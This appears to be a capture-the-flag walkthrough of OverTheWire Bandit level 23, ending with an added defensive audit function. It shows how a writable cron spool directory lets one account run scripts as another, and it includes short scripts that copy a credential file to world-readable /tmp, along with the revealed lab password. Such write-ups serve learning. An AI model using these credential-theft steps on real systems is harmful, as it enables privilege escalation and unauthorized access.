Wargames and bash knowledge 15

Bandit23

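A time-based job scheduler, cron, automatically runs a program at regular intervals. Look in /etc/cron.d/ for the configuration and see what command is being executed.

Note: this level requires you to create your own first shell script. This is a big step forward, and you should be proud of yourself when you reach this level!

Note 2: remember that your shell script is deleted once it has been executed, so you may want to keep a copy…

Recommended commands:
cron, crontab, crontab(5) (use "man 5 crontab" to access this)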


```bash
bandit23@bandit:~$ cd /etc/cron.d/
bandit23@bandit:/etc/cron.d$ ls -l
total 36
-rw-r--r-- 1 root root  62 Oct  5 06:19 cronjob_bandit15_root
-rw-r--r-- 1 root root  62 Oct  5 06:19 cronjob_bandit17_root
-rw-r--r-- 1 root root 120 Oct  5 06:19 cronjob_bandit22
-rw-r--r-- 1 root root 122 Oct  5 06:19 cronjob_bandit23
-rw-r--r-- 1 root root 120 Oct  5 06:19 cronjob_bandit24
-rw-r--r-- 1 root root  62 Oct  5 06:19 cronjob_bandit25_root
-rw-r--r-- 1 root root 201 Jan  8  2022 e2scrub_all
-rwx------ 1 root root  52 Oct  5 06:20 otw-tmp-dir
-rw-r--r-- 1 root root 396 Feb  2  2021 sysstat
bandit23@bandit:/etc/cron.d$ cat cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
bandit23@bandit:/etc/cron.d$ cd /usr/bin/
bandit23@bandit:/usr/bin$ ls -l cronjob_bandit*sh
-rwx------ 1 root     root     142 Oct  5 06:19 cronjob_bandit15_root.sh
-rwx------ 1 root     root     443 Oct  5 06:19 cronjob_bandit17_root.sh
-rwxr-x--- 1 bandit22 bandit21 130 Oct  5 06:19 cronjob_bandit22.sh
-rwxr-x--- 1 bandit23 bandit22 211 Oct  5 06:19 cronjob_bandit23.sh
-rwxr-x--- 1 bandit24 bandit23 384 Oct  5 06:19 cronjob_bandit24.sh
-rwx------ 1 root     root     497 Oct  5 06:19 cronjob_bandit25_root.sh
bandit23@bandit:/usr/bin$ cat cronjob_bandit24.sh
#!/bin/bash                 #shebang

myname=$(whoami)   

# Run every script in /var/spool/$myname/foo, then delete it
cd /var/spool/$myname/foo
echo "Executing and deleting all scripts in /var/spool/$myname/foo:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];  # skip the directory entries . and ..
    then
        echo "Handling $i"
        owner="$(stat --format "%U" ./$i)"
        if [ "${owner}" = "bandit23" ]; then
            timeout -s 9 60 ./$i          # send signal 9 (SIGKILL) if the script has not exited after 60 seconds
        fi
        rm -f ./$i
    fi
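done
```

The script amounts to a "backdoor" that user bandit24 has left for user bandit23: every minute it runs every script in /var/spool/$myname/foo whose file owner is bandit23, and if a script has not finished after 60 seconds it sends signal 9 (SIGKILL) to force the process to end.

Based on the level hint, the script above and previous experience, we can write a script that saves the contents of bandit24's password file in /etc/bandit_pass/ under /tmp by means of redirection.

```bash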
bandit23@bandit:~$ cd /var/spool 
bandit23@bandit:/var/spool$ ls
bandit24  cron  mail  rsyslog
bandit23@bandit:/var/spool$ cd /etc/ba
bandit_pass/       bash_completion.d/
bandit23@bandit:/var/spool$ cd /etc/bandit_pass/
bandit23@bandit:/etc/bandit_pass$ ls
bandit0   bandit12  bandit16  bandit2   bandit23  bandit27  bandit30  bandit4  bandit8
bandit1   bandit13  bandit17  bandit20  bandit24  bandit28  bandit31  bandit5  bandit9
bandit10  bandit14  bandit18  bandit21  bandit25  bandit29  bandit32  bandit6
bandit11  bandit15  bandit19  bandit22  bandit26  bandit3   bandit33  bandit7
bandit23@bandit:/etc/bandit_pass$ cd /tmp
bandit23@bandit:/tmp$ ls
ls: cannot open directory '.': Permission denied
```

Create the directory /tmp/bdit24:

```bash
bandit23@bandit:/tmp$ mkdir bdit24
bandit23@bandit:/tmp$
bandit23@bandit:/tmp$ cd bdit24
```

Edit the script with nano:

```bash
bandit23@bandit:/tmp/bdit24$ nano bd24
Unable to create directory /home/bandit23/.local/share/nano/: No such file or directory
It is required for saving/loading search history or cursor positions.

bandit23@bandit:/tmp/bdit24$ ls
bd24
```

View the finished script:

```bash
bandit23@bandit:/tmp/bdit24$ cat bd24
#!/bin/bash
cat /etc/bandit_pass/bandit24 >/tmp/147258369
```

The cron job script cronjob_bandit24.sh runs each script as ./$i, and running a script this way requires the script to have execute permission.

```bash
bandit23@bandit:/tmp/bdit24$ chmod 755 bd24

bandit23@bandit:/tmp/bdit24$ ls -l
total 4
-rwxr-xr-x 1 bandit23 bandit23 59 Jan 11 15:21 bd24
bandit23@bandit:/tmp/bdit24$ cp bd24 /var/spool/bandit24/
cp: cannot create regular file '/var/spool/bandit24/bd24': Operation not permitted
bandit23@bandit:/tmp/bdit24$ cd /var/spool
bandit23@bandit:/var/spool$ ls -l
total 12
dr-xr-x--- 3 bandit24 bandit23 4096 Oct  5 06:19 bandit24
drwxr-xr-x 3 root     root     4096 Sep 19 02:19 cron
lrwxrwxrwx 1 root     root        7 Sep 19 02:19 mail -> ../mail
drwx------ 2 syslog   adm      4096 Dec 30  2021 rsyslog
bandit23@bandit:/var/spool$ cd bandit24
bandit23@bandit:/var/spool/bandit24$ ls
foo
bandit23@bandit:/var/spool/bandit24$ ls -l
total 4
drwxrwx-wx 44 root bandit24 4096 Jan 11 15:22 foo
bandit23@bandit:/var/spool/bandit24$ cd foo
bandit23@bandit:/var/spool/bandit24/foo$ ls
ls: cannot open directory '.': Permission denied
```

Copy /tmp/bdit24/bd24 to /var/spool/bandit24/foo:

```bash
bandit23@bandit:/var/spool/bandit24/foo$ cp /tmp/bdit24/bd24 .
bandit23@bandit:/var/spool/bandit24/foo$ cat /tmp/147258369
cat: /tmp/147258369: No such file or directory
bandit23@bandit:/var/spool/bandit24/foo$ cd /tmp
bandit23@bandit:/tmp$ ls 147*
ls: cannot access '147*': No such file or directory
bandit23@bandit:/tmp$ ls
ls: cannot open directory '.': Permission denied
bandit23@bandit:~$ cat /tmp/147258369
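VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar
```

The cron job runs once a minute, so you have to wait for the script to be executed.

Method 2:

The key to this method is changing the permissions of the password file so that user bandit23 is allowed to read it.

```bash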
bandit23@bandit:/home$ cd /etc/bandit_pass/
bandit23@bandit:/etc/bandit_pass$ ls -l *24
-r-------- 1 bandit24 bandit24 33 Oct  5 06:19 bandit24
bandit23@bandit:/etc/bandit_pass$ cd /tmp/bdit24
bandit23@bandit:/tmp/bdit24$ nano bd24
bandit23@bandit:/tmp/bdit24$ cp bd24 /var/spool/bandit24/foo/
bandit23@bandit:/tmp/bdit24$ cat bd24
#!/bin/bash
mkdir -p /tmp/2424/
cp /etc/bandit_pass/bandit24 /tmp/2424/
chmod 755 /tmp/2424/
chmod 644 /tmp/2424/bandit24
bandit23@bandit:/tmp/bdit24$ cd ../2424
-bash: cd: ../2424: No such file or directory
bandit23@bandit:/tmp/bdit24$ cd /tmp/2424
-bash: cd: /tmp/2424: No such file or directory

bandit23@bandit:~$ cd /tmp/2424
bandit23@bandit:/tmp/2424$ ls
bandit24
bandit23@bandit:/tmp/2424$ cat bandit24
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar
```
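
The directory permissions seen above (`drwxrwx-wx` on /var/spool/bandit24/foo) are what let another account place a script where the cron job will run it as bandit24. As an added example that is not part of the original post, the following shell functions audit a directory whose contents a scheduled job executes; the function names `has_mode` and `audit_exec_dir` are hypothetical.

```bash
#!/bin/sh
# Added example, not from the original post. Function names are hypothetical.
# Audits a directory whose contents a scheduled job executes (in the
# walkthrough: /var/spool/bandit24/foo). Anyone who can create a file
# there can run code as the job's user.

# has_mode PATH BITS: true if PATH itself has every permission bit in BITS.
# `find -prune -perm` is POSIX, so no GNU-specific stat is needed.
has_mode() {
    [ -n "$(find "$1" -prune -perm "-$2" -print 2>/dev/null)" ]
}

# audit_exec_dir DIR: print one finding per line.
# Exit status: 0 = no findings, 1 = findings, 2 = DIR is not a directory.
audit_exec_dir() {
    dir=$1
    rc=0
    [ -d "$dir" ] || { echo "ERROR $dir: not a directory"; return 2; }

    if has_mode "$dir" 0002; then
        echo "HIGH $dir: writable by every local user"
        rc=1
    fi
    if has_mode "$dir" 0020; then
        group=$(ls -ld "$dir" | awk '{print $4}')
        echo "MEDIUM $dir: writable by group $group"
        rc=1
    fi
    # Files already inside that other accounts could overwrite in place.
    # If the auditor cannot list the directory, the globs stay unexpanded
    # and the loop body is skipped.
    for f in "$dir"/* "$dir"/.[!.]*; do
        [ -f "$f" ] || continue
        if has_mode "$f" 0002 || has_mode "$f" 0020; then
            echo "MEDIUM $f: file is group- or world-writable"
            rc=1
        fi
    done
    return $rc
}
```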
